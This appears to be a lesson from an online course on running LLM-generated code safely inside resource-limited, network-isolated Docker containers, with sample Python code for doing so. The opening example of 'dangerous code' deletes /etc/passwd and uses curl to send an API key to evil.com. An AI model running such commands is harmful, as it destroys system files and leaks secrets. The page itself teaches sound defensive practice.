Sandboxing with Docker and RestrictedPython
Create isolated execution environments using Docker containers with resource limits, network isolation, and read-only filesystems to safely run untrusted LLM-generated code.
Why Code Sandboxing Is Non-Negotiable
LLM-generated code runs with the same permissions as the process that calls it. A careless or maliciously injected code snippet can delete files, read environment variables containing API keys, make network requests, exhaust RAM or CPU, or install backdoors. Sandboxing creates an isolated execution environment that limits what the generated code can do, making code execution agents safe enough to run in production.
# Example of dangerous code an LLM might generate
import os
import subprocess
# Without sandboxing, this runs with full host permissions:
os.remove('/etc/passwd') # deletes system file
subprocess.run(['curl', 'http://evil.com', '-d', os.environ['OPENAI_API_KEY']]) # exfiltrates secrets
while True: pass # exhausts CPU
# Sandboxing prevents ALL of thisDocker as a Sandbox
Docker containers are the most practical sandbox for LLM-generated code in production. Each code execution gets a fresh container built from a minimal image, with strict resource limits on CPU, memory, and time. The container has no access to the host filesystem (except an explicit workspace mount), and network access is disabled or restricted to a whitelist. When execution completes, the container is destroyed.
import docker
import tempfile
import os
client = docker.from_env()
def execute_in_docker(code: str, timeout=30) -> tuple[str, str]:
# Write code to temp file
with tempfile.NamedTemporaryFile(mode='w', suffix='.py', delete=False) as f:
f.write(code)
host_path = f.name
try:
container = client.containers.run(
image='python:3.11-slim', # minimal Python image
command=f'python /workspace/code.py',
volumes={host_path: {'bind': '/workspace/code.py', 'mode': 'ro'}},
mem_limit='256m', # max 256 MB RAM
cpu_period=100000,
cpu_quota=50000, # 50% of 1 CPU core
network_disabled=True, # no internet access
read_only=True, # read-only root filesystem
remove=True, # auto-delete container
timeout=timeout
)
return container.decode('utf-8'), ''
except docker.errors.ContainerError as e:
return '', e.stderr.decode('utf-8')
finally:
os.unlink(host_path)All lessons in this course
- The Code Execution Loop
- Sandboxing with Docker and RestrictedPython
- State Management Across Execution Steps
- Building a Data Analysis Agent